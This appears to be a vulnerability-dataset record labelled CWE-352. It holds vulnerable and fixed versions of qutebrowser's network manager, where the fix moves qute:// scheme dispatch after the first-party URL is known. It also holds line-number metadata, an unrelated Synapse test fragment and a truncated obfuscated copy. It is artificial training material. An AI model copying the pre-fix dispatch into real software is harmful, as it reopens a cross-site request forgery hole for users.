self.room_list_handler.enable_room_list_search = True
self.directory_handler.enable_room_list_search = True
VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
self.assertEquals(200, VAR_21.code, VAR_21.result)
self.assertTrue(len(VAR_21.json_body["chunk"]) > 0)
self.room_list_handler.enable_room_list_search = False
self.directory_handler.enable_room_list_search = False
VAR_20, VAR_21 = self.make_request("GET", b"publicRooms")
self.assertEquals(200, VAR_21.code, VAR_21.result)
self.assertTrue(len(VAR_21.json_body["chunk"]) == 0)
VAR_19 = self.helper.create_room_as(self.user_id)
VAR_20, VAR_21 = self.make_request(
"PUT", b"directory/list/room/%s" % (VAR_19.encode("ascii"),), b"{}"
)
self.assertEquals(403, VAR_21.code, VAR_21.result)
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
25,
28,
29,
32,
36,
38,
41,
43,
50,
52,
54,
58,
60,
67,
69,
71,
76,
78,
89,
96,
100,
102,
103,
111,
114,
115,
118,
119,
123,
126,
127,
131,
139,
145,
152,
158,
164,
165,
173,
178,
179,
182,
183,
187,
190,
191,
195,
197,
203,
213,
216,
218,
219,
226,
227,
232,
235,
237,
238,
245,
246,
251,
255,
256,
263,
264,
271,
272,
277,
278,
282,
289,
294,
295,
298,
299,
303,
306,
310,
311,
318,
324,
332,
335,
339,
343,
344,
350,
354,
357,
360,
361,
368,
374,
375,
381,
385,
386,
389,
391,
393,
399,
402,
404,
406,
409,
416,
419,
426,
427,
430,
432,
435,
440,
443,
445,
449,
450,
454,
457,
458,
462,
463,
469,
31,
280,
281,
133,
141,
154,
205,
215,
234,
253,
308,
320,
326,
334,
356
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
14,
15,
16,
18,
25,
28,
29,
32,
36,
38,
41,
43,
50,
52,
54,
58,
60,
67,
69,
71,
76,
78,
89,
96,
100,
102,
103,
111,
114,
115,
118,
119,
123,
126,
127,
131,
139,
145,
152,
158,
164,
165,
173,
178,
179,
182,
183,
187,
190,
191,
195,
197,
203,
213,
216,
218,
219,
226,
227,
232,
235,
237,
238,
245,
246,
251,
255,
256,
263,
264,
271,
272,
277,
278,
282,
289,
294,
295,
298,
299,
303,
306,
310,
311,
318,
324,
332,
335,
339,
343,
344,
350,
354,
357,
360,
361,
368,
374,
375,
381,
385,
386,
389,
391,
393,
399,
402,
404,
406,
409,
416,
419,
426,
427,
430,
432,
435,
440,
443,
445,
449,
450,
454,
457,
458,
462,
463,
469,
31,
280,
281,
133,
141,
154,
205,
215,
234,
253,
308,
320,
326,
334,
356
] |
3CWE-352
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Our own QNetworkAccessManager."""
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
HOSTBLOCK_ERROR_STRING = '%HOSTBLOCK%'
_proxy_auth_cache = {}
@attr.s(frozen=True)
class ProxyId:
"""Information identifying a proxy server."""
type = attr.ib()
hostname = attr.ib()
port = attr.ib()
def _is_secure_cipher(cipher):
"""Check if a given SSL cipher (hopefully) isn't broken yet."""
tokens = [e.upper() for e in cipher.name().split('-')]
if cipher.usedBits() < 128:
# https://codereview.qt-project.org/#/c/75943/
return False
# OpenSSL should already protect against this in a better way
elif cipher.keyExchangeMethod() == 'DH' and utils.is_windows:
# https://weakdh.org/
return False
elif cipher.encryptionMethod().upper().startswith('RC4'):
# http://en.wikipedia.org/wiki/RC4#Security
# https://codereview.qt-project.org/#/c/148906/
return False
elif cipher.encryptionMethod().upper().startswith('DES'):
# http://en.wikipedia.org/wiki/Data_Encryption_Standard#Security_and_cryptanalysis
return False
elif 'MD5' in tokens:
# http://www.win.tue.nl/hashclash/rogue-ca/
return False
# OpenSSL should already protect against this in a better way
# elif (('CBC3' in tokens or 'CBC' in tokens) and (cipher.protocol() not in
# [QSsl.TlsV1_0, QSsl.TlsV1_1, QSsl.TlsV1_2])):
# # http://en.wikipedia.org/wiki/POODLE
# return False
### These things should never happen as those are already filtered out by
### either the SSL libraries or Qt - but let's be sure.
elif cipher.authenticationMethod() in ['aNULL', 'NULL']:
# Ciphers without authentication.
return False
elif cipher.encryptionMethod() in ['eNULL', 'NULL']:
# Ciphers without encryption.
return False
elif 'EXP' in tokens or 'EXPORT' in tokens:
# Weak export-grade ciphers
return False
elif 'ADH' in tokens:
# No MITM protection
return False
### This *should* happen ;)
else:
return True
def init():
"""Disable insecure SSL ciphers on old Qt versions."""
default_ciphers = QSslSocket.defaultCiphers()
log.init.debug("Default Qt ciphers: {}".format(
', '.join(c.name() for c in default_ciphers)))
good_ciphers = []
bad_ciphers = []
for cipher in default_ciphers:
if _is_secure_cipher(cipher):
good_ciphers.append(cipher)
else:
bad_ciphers.append(cipher)
log.init.debug("Disabling bad ciphers: {}".format(
', '.join(c.name() for c in bad_ciphers)))
QSslSocket.setDefaultCiphers(good_ciphers)
class NetworkManager(QNetworkAccessManager):
"""Our own QNetworkAccessManager.
Attributes:
adopted_downloads: If downloads are running with this QNAM but the
associated tab gets closed already, the NAM gets
reparented to the DownloadManager. This counts the
still running downloads, so the QNAM can clean
itself up when this reaches zero again.
_scheme_handlers: A dictionary (scheme -> handler) of supported custom
schemes.
_win_id: The window ID this NetworkManager is associated with.
(or None for generic network managers)
_tab_id: The tab ID this NetworkManager is associated with.
(or None for generic network managers)
_rejected_ssl_errors: A {QUrl: [SslError]} dict of rejected errors.
_accepted_ssl_errors: A {QUrl: [SslError]} dict of accepted errors.
_private: Whether we're in private browsing mode.
netrc_used: Whether netrc authentication was performed.
Signals:
shutting_down: Emitted when the QNAM is shutting down.
"""
shutting_down = pyqtSignal()
def __init__(self, *, win_id, tab_id, private, parent=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
# WORKAROUND for a hang when a message is printed - See:
# http://www.riverbankcomputing.com/pipermail/pyqt/2014-November/035045.html
super().__init__(parent)
log.init.debug("NetworkManager init done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = win_id
self._tab_id = tab_id
self._private = private
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def _set_cookiejar(self):
"""Set the cookie jar of the NetworkManager correctly."""
if self._private:
cookie_jar = objreg.get('ram-cookie-jar')
else:
cookie_jar = objreg.get('cookie-jar')
# We have a shared cookie jar - we restore its parent so we don't
# take ownership of it.
self.setCookieJar(cookie_jar)
app = QCoreApplication.instance()
cookie_jar.setParent(app)
def _set_cache(self):
"""Set the cache of the NetworkManager correctly."""
if self._private:
return
# We have a shared cache - we restore its parent so we don't take
# ownership of it.
app = QCoreApplication.instance()
cache = objreg.get('cache')
self.setCache(cache)
cache.setParent(app)
def _get_abort_signals(self, owner=None):
"""Get a list of signals which should abort a question."""
abort_on = [self.shutting_down]
if owner is not None:
abort_on.append(owner.destroyed)
# This might be a generic network manager, e.g. one belonging to a
# DownloadManager. In this case, just skip the webview thing.
if self._tab_id is not None:
assert self._win_id is not None
tab = objreg.get('tab', scope='tab', window=self._win_id,
tab=self._tab_id)
abort_on.append(tab.load_started)
return abort_on
def shutdown(self):
"""Abort all running requests."""
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
# No @pyqtSlot here, see
# https://github.com/qutebrowser/qutebrowser/issues/2213
def on_ssl_errors(self, reply, errors): # noqa: C901 pragma: no mccabe
"""Decide if SSL errors should be ignored or not.
This slot is called on SSL/TLS errors by the self.sslErrors signal.
Args:
reply: The QNetworkReply that is encountering the errors.
errors: A list of errors.
"""
errors = [certificateerror.CertificateErrorWrapper(e) for e in errors]
log.webview.debug("Certificate errors: {!r}".format(
' / '.join(str(err) for err in errors)))
try:
host_tpl = urlutils.host_tuple(reply.url())
except ValueError:
host_tpl = None
is_accepted = False
is_rejected = False
else:
is_accepted = set(errors).issubset(
self._accepted_ssl_errors[host_tpl])
is_rejected = set(errors).issubset(
self._rejected_ssl_errors[host_tpl])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(is_accepted, is_rejected))
if is_rejected:
return
elif is_accepted:
reply.ignoreSslErrors()
return
abort_on = self._get_abort_signals(reply)
ignore = shared.ignore_certificate_errors(reply.url(), errors,
abort_on=abort_on)
if ignore:
reply.ignoreSslErrors()
err_dict = self._accepted_ssl_errors
else:
err_dict = self._rejected_ssl_errors
if host_tpl is not None:
err_dict[host_tpl] += errors
def clear_all_ssl_errors(self):
"""Clear all remembered SSL errors."""
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def clear_rejected_ssl_errors(self, url):
"""Clear the rejected SSL errors on a reload.
Args:
url: The URL to remove.
"""
try:
del self._rejected_ssl_errors[url]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def on_authentication_required(self, reply, authenticator):
"""Called when a website needs authentication."""
netrc_success = False
if not self.netrc_used:
self.netrc_used = True
netrc_success = shared.netrc_authentication(reply.url(),
authenticator)
if not netrc_success:
abort_on = self._get_abort_signals(reply)
shared.authentication_required(reply.url(), authenticator,
abort_on=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def on_proxy_authentication_required(self, proxy, authenticator):
"""Called when a proxy needs authentication."""
proxy_id = ProxyId(proxy.type(), proxy.hostName(), proxy.port())
if proxy_id in _proxy_auth_cache:
user, password = _proxy_auth_cache[proxy_id]
authenticator.setUser(user)
authenticator.setPassword(password)
else:
msg = '<b>{}</b> says:<br/>{}'.format(
html.escape(proxy.hostName()),
html.escape(authenticator.realm()))
abort_on = self._get_abort_signals()
answer = message.ask(
title="Proxy authentication required", text=msg,
mode=usertypes.PromptMode.user_pwd, abort_on=abort_on)
if answer is not None:
authenticator.setUser(answer.user)
authenticator.setPassword(answer.password)
_proxy_auth_cache[proxy_id] = answer
@pyqtSlot()
def on_adopted_download_destroyed(self):
"""Check if we can clean up if an adopted download was destroyed.
See the description for adopted_downloads for details.
"""
self.adopted_downloads -= 1
log.downloads.debug("Adopted download destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def adopt_download(self, download):
"""Adopt a new DownloadItem."""
self.adopted_downloads += 1
log.downloads.debug("Adopted download, {} adopted.".format(
self.adopted_downloads))
download.destroyed.connect(self.on_adopted_download_destroyed)
download.adopt_download.connect(self.adopt_download)
def set_referer(self, req, current_url):
"""Set the referer header."""
referer_header_conf = config.val.content.headers.referer
try:
if referer_header_conf == 'never':
# Note: using ''.encode('ascii') sends a header with no value,
# instead of no header at all
req.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (referer_header_conf == 'same-domain' and
not urlutils.same_domain(req.url(), current_url)):
req.setRawHeader('Referer'.encode('ascii'), QByteArray())
# If refer_header_conf is set to 'always', we leave the header
# alone as QtWebKit did set it.
except urlutils.InvalidUrlError:
# req.url() or current_url can be invalid - this happens on
# https://www.playstation.com/ for example.
pass
# WORKAROUND for:
# http://www.riverbankcomputing.com/pipermail/pyqt/2014-September/034806.html
#
# By returning False, we provoke a TypeError because of a wrong return
# type, which does *not* trigger a segfault but invoke our return handler
# immediately.
@utils.prevent_exceptions(False)
def createRequest(self, op, req, outgoing_data):
"""Return a new QNetworkReply object.
Args:
op: Operation op
req: const QNetworkRequest & req
outgoing_data: QIODevice * outgoingData
Return:
A QNetworkReply.
"""
proxy_factory = objreg.get('proxy-factory', None)
if proxy_factory is not None:
proxy_error = proxy_factory.get_error()
if proxy_error is not None:
return networkreply.ErrorNetworkReply(
req, proxy_error, QNetworkReply.UnknownProxyError,
self)
scheme = req.url().scheme()
if scheme in self._scheme_handlers:
result = self._scheme_handlers[scheme](req)
if result is not None:
result.setParent(self)
return result
for header, value in shared.custom_headers(url=req.url()):
req.setRawHeader(header, value)
host_blocker = objreg.get('host-blocker')
if host_blocker.is_blocked(req.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
req.url().host()))
return networkreply.ErrorNetworkReply(
req, HOSTBLOCK_ERROR_STRING, QNetworkReply.ContentAccessDenied,
self)
# There are some scenarios where we can't figure out current_url:
# - There's a generic NetworkManager, e.g. for downloads
# - The download was in a tab which is now closed.
current_url = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
tab = objreg.get('tab', scope='tab', window=self._win_id,
tab=self._tab_id)
current_url = tab.url()
except (KeyError, RuntimeError):
# https://github.com/qutebrowser/qutebrowser/issues/889
# Catching RuntimeError because we could be in the middle of
# the webpage shutdown here.
current_url = QUrl()
if 'log-requests' in self._args.debug_flags:
operation = debug.qenum_key(QNetworkAccessManager, op)
operation = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
operation,
req.url().toDisplayString(),
current_url.toDisplayString()))
self.set_referer(req, current_url)
return super().createRequest(op, req, outgoing_data)
| # vim: ft=python fileencoding=utf-8 sts=4 sw=4 et:
# Copyright 2014-2018 Florian Bruhin (The Compiler) <mail@qutebrowser.org>
#
# This file is part of qutebrowser.
#
# qutebrowser is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# qutebrowser is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with qutebrowser. If not, see <http://www.gnu.org/licenses/>.
"""Our own QNetworkAccessManager."""
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
HOSTBLOCK_ERROR_STRING = '%HOSTBLOCK%'
_proxy_auth_cache = {}
@attr.s(frozen=True)
class ProxyId:
"""Information identifying a proxy server."""
type = attr.ib()
hostname = attr.ib()
port = attr.ib()
def _is_secure_cipher(cipher):
"""Check if a given SSL cipher (hopefully) isn't broken yet."""
tokens = [e.upper() for e in cipher.name().split('-')]
if cipher.usedBits() < 128:
# https://codereview.qt-project.org/#/c/75943/
return False
# OpenSSL should already protect against this in a better way
elif cipher.keyExchangeMethod() == 'DH' and utils.is_windows:
# https://weakdh.org/
return False
elif cipher.encryptionMethod().upper().startswith('RC4'):
# http://en.wikipedia.org/wiki/RC4#Security
# https://codereview.qt-project.org/#/c/148906/
return False
elif cipher.encryptionMethod().upper().startswith('DES'):
# http://en.wikipedia.org/wiki/Data_Encryption_Standard#Security_and_cryptanalysis
return False
elif 'MD5' in tokens:
# http://www.win.tue.nl/hashclash/rogue-ca/
return False
# OpenSSL should already protect against this in a better way
# elif (('CBC3' in tokens or 'CBC' in tokens) and (cipher.protocol() not in
# [QSsl.TlsV1_0, QSsl.TlsV1_1, QSsl.TlsV1_2])):
# # http://en.wikipedia.org/wiki/POODLE
# return False
### These things should never happen as those are already filtered out by
### either the SSL libraries or Qt - but let's be sure.
elif cipher.authenticationMethod() in ['aNULL', 'NULL']:
# Ciphers without authentication.
return False
elif cipher.encryptionMethod() in ['eNULL', 'NULL']:
# Ciphers without encryption.
return False
elif 'EXP' in tokens or 'EXPORT' in tokens:
# Weak export-grade ciphers
return False
elif 'ADH' in tokens:
# No MITM protection
return False
### This *should* happen ;)
else:
return True
def init():
"""Disable insecure SSL ciphers on old Qt versions."""
default_ciphers = QSslSocket.defaultCiphers()
log.init.debug("Default Qt ciphers: {}".format(
', '.join(c.name() for c in default_ciphers)))
good_ciphers = []
bad_ciphers = []
for cipher in default_ciphers:
if _is_secure_cipher(cipher):
good_ciphers.append(cipher)
else:
bad_ciphers.append(cipher)
log.init.debug("Disabling bad ciphers: {}".format(
', '.join(c.name() for c in bad_ciphers)))
QSslSocket.setDefaultCiphers(good_ciphers)
class NetworkManager(QNetworkAccessManager):
"""Our own QNetworkAccessManager.
Attributes:
adopted_downloads: If downloads are running with this QNAM but the
associated tab gets closed already, the NAM gets
reparented to the DownloadManager. This counts the
still running downloads, so the QNAM can clean
itself up when this reaches zero again.
_scheme_handlers: A dictionary (scheme -> handler) of supported custom
schemes.
_win_id: The window ID this NetworkManager is associated with.
(or None for generic network managers)
_tab_id: The tab ID this NetworkManager is associated with.
(or None for generic network managers)
_rejected_ssl_errors: A {QUrl: [SslError]} dict of rejected errors.
_accepted_ssl_errors: A {QUrl: [SslError]} dict of accepted errors.
_private: Whether we're in private browsing mode.
netrc_used: Whether netrc authentication was performed.
Signals:
shutting_down: Emitted when the QNAM is shutting down.
"""
shutting_down = pyqtSignal()
def __init__(self, *, win_id, tab_id, private, parent=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
# WORKAROUND for a hang when a message is printed - See:
# http://www.riverbankcomputing.com/pipermail/pyqt/2014-November/035045.html
super().__init__(parent)
log.init.debug("NetworkManager init done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = win_id
self._tab_id = tab_id
self._private = private
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def _set_cookiejar(self):
"""Set the cookie jar of the NetworkManager correctly."""
if self._private:
cookie_jar = objreg.get('ram-cookie-jar')
else:
cookie_jar = objreg.get('cookie-jar')
# We have a shared cookie jar - we restore its parent so we don't
# take ownership of it.
self.setCookieJar(cookie_jar)
app = QCoreApplication.instance()
cookie_jar.setParent(app)
def _set_cache(self):
"""Set the cache of the NetworkManager correctly."""
if self._private:
return
# We have a shared cache - we restore its parent so we don't take
# ownership of it.
app = QCoreApplication.instance()
cache = objreg.get('cache')
self.setCache(cache)
cache.setParent(app)
def _get_abort_signals(self, owner=None):
"""Get a list of signals which should abort a question."""
abort_on = [self.shutting_down]
if owner is not None:
abort_on.append(owner.destroyed)
# This might be a generic network manager, e.g. one belonging to a
# DownloadManager. In this case, just skip the webview thing.
if self._tab_id is not None:
assert self._win_id is not None
tab = objreg.get('tab', scope='tab', window=self._win_id,
tab=self._tab_id)
abort_on.append(tab.load_started)
return abort_on
def shutdown(self):
"""Abort all running requests."""
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
# No @pyqtSlot here, see
# https://github.com/qutebrowser/qutebrowser/issues/2213
def on_ssl_errors(self, reply, errors): # noqa: C901 pragma: no mccabe
"""Decide if SSL errors should be ignored or not.
This slot is called on SSL/TLS errors by the self.sslErrors signal.
Args:
reply: The QNetworkReply that is encountering the errors.
errors: A list of errors.
"""
errors = [certificateerror.CertificateErrorWrapper(e) for e in errors]
log.webview.debug("Certificate errors: {!r}".format(
' / '.join(str(err) for err in errors)))
try:
host_tpl = urlutils.host_tuple(reply.url())
except ValueError:
host_tpl = None
is_accepted = False
is_rejected = False
else:
is_accepted = set(errors).issubset(
self._accepted_ssl_errors[host_tpl])
is_rejected = set(errors).issubset(
self._rejected_ssl_errors[host_tpl])
log.webview.debug("Already accepted: {} / "
"rejected {}".format(is_accepted, is_rejected))
if is_rejected:
return
elif is_accepted:
reply.ignoreSslErrors()
return
abort_on = self._get_abort_signals(reply)
ignore = shared.ignore_certificate_errors(reply.url(), errors,
abort_on=abort_on)
if ignore:
reply.ignoreSslErrors()
err_dict = self._accepted_ssl_errors
else:
err_dict = self._rejected_ssl_errors
if host_tpl is not None:
err_dict[host_tpl] += errors
def clear_all_ssl_errors(self):
"""Clear all remembered SSL errors."""
self._accepted_ssl_errors.clear()
self._rejected_ssl_errors.clear()
@pyqtSlot(QUrl)
def clear_rejected_ssl_errors(self, url):
"""Clear the rejected SSL errors on a reload.
Args:
url: The URL to remove.
"""
try:
del self._rejected_ssl_errors[url]
except KeyError:
pass
@pyqtSlot('QNetworkReply*', 'QAuthenticator*')
def on_authentication_required(self, reply, authenticator):
"""Called when a website needs authentication."""
netrc_success = False
if not self.netrc_used:
self.netrc_used = True
netrc_success = shared.netrc_authentication(reply.url(),
authenticator)
if not netrc_success:
abort_on = self._get_abort_signals(reply)
shared.authentication_required(reply.url(), authenticator,
abort_on=abort_on)
@pyqtSlot('QNetworkProxy', 'QAuthenticator*')
def on_proxy_authentication_required(self, proxy, authenticator):
"""Called when a proxy needs authentication."""
proxy_id = ProxyId(proxy.type(), proxy.hostName(), proxy.port())
if proxy_id in _proxy_auth_cache:
user, password = _proxy_auth_cache[proxy_id]
authenticator.setUser(user)
authenticator.setPassword(password)
else:
msg = '<b>{}</b> says:<br/>{}'.format(
html.escape(proxy.hostName()),
html.escape(authenticator.realm()))
abort_on = self._get_abort_signals()
answer = message.ask(
title="Proxy authentication required", text=msg,
mode=usertypes.PromptMode.user_pwd, abort_on=abort_on)
if answer is not None:
authenticator.setUser(answer.user)
authenticator.setPassword(answer.password)
_proxy_auth_cache[proxy_id] = answer
@pyqtSlot()
def on_adopted_download_destroyed(self):
"""Check if we can clean up if an adopted download was destroyed.
See the description for adopted_downloads for details.
"""
self.adopted_downloads -= 1
log.downloads.debug("Adopted download destroyed, {} left.".format(
self.adopted_downloads))
assert self.adopted_downloads >= 0
if self.adopted_downloads == 0:
self.deleteLater()
@pyqtSlot(object) # DownloadItem
def adopt_download(self, download):
"""Adopt a new DownloadItem."""
self.adopted_downloads += 1
log.downloads.debug("Adopted download, {} adopted.".format(
self.adopted_downloads))
download.destroyed.connect(self.on_adopted_download_destroyed)
download.adopt_download.connect(self.adopt_download)
def set_referer(self, req, current_url):
"""Set the referer header."""
referer_header_conf = config.val.content.headers.referer
try:
if referer_header_conf == 'never':
# Note: using ''.encode('ascii') sends a header with no value,
# instead of no header at all
req.setRawHeader('Referer'.encode('ascii'), QByteArray())
elif (referer_header_conf == 'same-domain' and
not urlutils.same_domain(req.url(), current_url)):
req.setRawHeader('Referer'.encode('ascii'), QByteArray())
# If refer_header_conf is set to 'always', we leave the header
# alone as QtWebKit did set it.
except urlutils.InvalidUrlError:
# req.url() or current_url can be invalid - this happens on
# https://www.playstation.com/ for example.
pass
# WORKAROUND for:
# http://www.riverbankcomputing.com/pipermail/pyqt/2014-September/034806.html
#
# By returning False, we provoke a TypeError because of a wrong return
# type, which does *not* trigger a segfault but invoke our return handler
# immediately.
@utils.prevent_exceptions(False)
def createRequest(self, op, req, outgoing_data):
"""Return a new QNetworkReply object.
Args:
op: Operation op
req: const QNetworkRequest & req
outgoing_data: QIODevice * outgoingData
Return:
A QNetworkReply.
"""
proxy_factory = objreg.get('proxy-factory', None)
if proxy_factory is not None:
proxy_error = proxy_factory.get_error()
if proxy_error is not None:
return networkreply.ErrorNetworkReply(
req, proxy_error, QNetworkReply.UnknownProxyError,
self)
for header, value in shared.custom_headers(url=req.url()):
req.setRawHeader(header, value)
host_blocker = objreg.get('host-blocker')
if host_blocker.is_blocked(req.url()):
log.webview.info("Request to {} blocked by host blocker.".format(
req.url().host()))
return networkreply.ErrorNetworkReply(
req, HOSTBLOCK_ERROR_STRING, QNetworkReply.ContentAccessDenied,
self)
# There are some scenarios where we can't figure out current_url:
# - There's a generic NetworkManager, e.g. for downloads
# - The download was in a tab which is now closed.
current_url = QUrl()
if self._tab_id is not None:
assert self._win_id is not None
try:
tab = objreg.get('tab', scope='tab', window=self._win_id,
tab=self._tab_id)
current_url = tab.url()
except (KeyError, RuntimeError):
# https://github.com/qutebrowser/qutebrowser/issues/889
# Catching RuntimeError because we could be in the middle of
# the webpage shutdown here.
current_url = QUrl()
if 'log-requests' in self._args.debug_flags:
operation = debug.qenum_key(QNetworkAccessManager, op)
operation = operation.replace('Operation', '').upper()
log.webview.debug("{} {}, first-party {}".format(
operation,
req.url().toDisplayString(),
current_url.toDisplayString()))
scheme = req.url().scheme()
if scheme in self._scheme_handlers:
result = self._scheme_handlers[scheme](req, op, current_url)
if result is not None:
result.setParent(self)
return result
self.set_referer(req, current_url)
return super().createRequest(op, req, outgoing_data)
| xsrf | {
"code": [
" scheme = req.url().scheme()",
" if scheme in self._scheme_handlers:",
" result = self._scheme_handlers[scheme](req)",
" if result is not None:",
" result.setParent(self)",
" return result"
],
"line_no": [
376,
377,
378,
379,
380,
381
]
} | {
"code": [
" scheme = req.url().scheme()",
" if scheme in self._scheme_handlers:",
" result = self._scheme_handlers[scheme](req, op, current_url)",
" if result is not None:",
" result.setParent(self)",
" return result"
],
"line_no": [
412,
413,
414,
415,
416,
417
]
} |
import collections
import html
import attr
from PyQt5.QtCore import (pyqtSlot, pyqtSignal, QCoreApplication, QUrl,
QByteArray)
from PyQt5.QtNetwork import QNetworkAccessManager, QNetworkReply, QSslSocket
from qutebrowser.config import config
from qutebrowser.utils import (message, log, usertypes, utils, objreg,
urlutils, debug)
from qutebrowser.browser import shared
from qutebrowser.browser.webkit import certificateerror
from qutebrowser.browser.webkit.network import (webkitqutescheme, networkreply,
filescheme)
VAR_0 = '%HOSTBLOCK%'
VAR_1 = {}
@attr.s(frozen=True)
class CLASS_0:
VAR_3 = attr.ib()
VAR_4 = attr.ib()
VAR_5 = attr.ib()
def FUNC_0(VAR_2):
VAR_6 = [e.upper() for e in VAR_2.name().split('-')]
if VAR_2.usedBits() < 128:
return False
elif VAR_2.keyExchangeMethod() == 'DH' and utils.is_windows:
return False
elif VAR_2.encryptionMethod().upper().startswith('RC4'):
return False
elif VAR_2.encryptionMethod().upper().startswith('DES'):
return False
elif 'MD5' in VAR_6:
return False
elif VAR_2.authenticationMethod() in ['aNULL', 'NULL']:
return False
elif VAR_2.encryptionMethod() in ['eNULL', 'NULL']:
return False
elif 'EXP' in VAR_6 or 'EXPORT' in VAR_6:
return False
elif 'ADH' in VAR_6:
return False
else:
return True
def FUNC_1():
VAR_7 = QSslSocket.defaultCiphers()
log.init.debug("Default Qt ciphers: {}".format(
', '.join(c.name() for c in VAR_7)))
VAR_8 = []
VAR_9 = []
for VAR_2 in VAR_7:
if FUNC_0(VAR_2):
VAR_8.append(VAR_2)
else:
VAR_9.append(VAR_2)
log.init.debug("Disabling bad ciphers: {}".format(
', '.join(c.name() for c in VAR_9)))
QSslSocket.setDefaultCiphers(VAR_8)
class CLASS_1(QNetworkAccessManager):
VAR_10 = pyqtSignal()
def __init__(self, *, VAR_11, VAR_12, VAR_13, VAR_14=None):
log.init.debug("Initializing NetworkManager")
with log.disable_qt_msghandler():
super().__init__(VAR_14)
log.init.debug("NetworkManager FUNC_1 done")
self.adopted_downloads = 0
self._args = objreg.get('args')
self._win_id = VAR_11
self._tab_id = VAR_12
self._private = VAR_13
self._scheme_handlers = {
'qute': webkitqutescheme.handler,
'file': filescheme.handler,
}
self._set_cookiejar()
self._set_cache()
self.sslErrors.connect(self.on_ssl_errors)
self._rejected_ssl_errors = collections.defaultdict(list)
self._accepted_ssl_errors = collections.defaultdict(list)
self.authenticationRequired.connect(self.on_authentication_required)
self.proxyAuthenticationRequired.connect(
self.on_proxy_authentication_required)
self.netrc_used = False
def FUNC_2(self):
if self._private:
VAR_36 = objreg.get('ram-cookie-jar')
else:
VAR_36 = objreg.get('cookie-jar')
self.setCookieJar(VAR_36)
VAR_26 = QCoreApplication.instance()
VAR_36.setParent(VAR_26)
def FUNC_3(self):
if self._private:
return
VAR_26 = QCoreApplication.instance()
VAR_27 = objreg.get('cache')
self.setCache(VAR_27)
cache.setParent(VAR_26)
def FUNC_4(self, VAR_15=None):
VAR_28 = [self.shutting_down]
if VAR_15 is not None:
VAR_28.append(VAR_15.destroyed)
if self._tab_id is not None:
assert self._win_id is not None
VAR_37 = objreg.get('tab', scope='tab', window=self._win_id,
VAR_37=self._tab_id)
VAR_28.append(VAR_37.load_started)
return VAR_28
def FUNC_5(self):
self.setNetworkAccessible(QNetworkAccessManager.NotAccessible)
self.shutting_down.emit()
def FUNC_6(self, VAR_16, VAR_17): # noqa: C901 pragma: no mccabe
VAR_17 = [certificateerror.CertificateErrorWrapper(e) for e in VAR_17]
log.webview.debug("Certificate VAR_17: {!r}".format(
' / '.join(str(err) for err in VAR_17)))
try:
VAR_38 = urlutils.host_tuple(VAR_16.url())
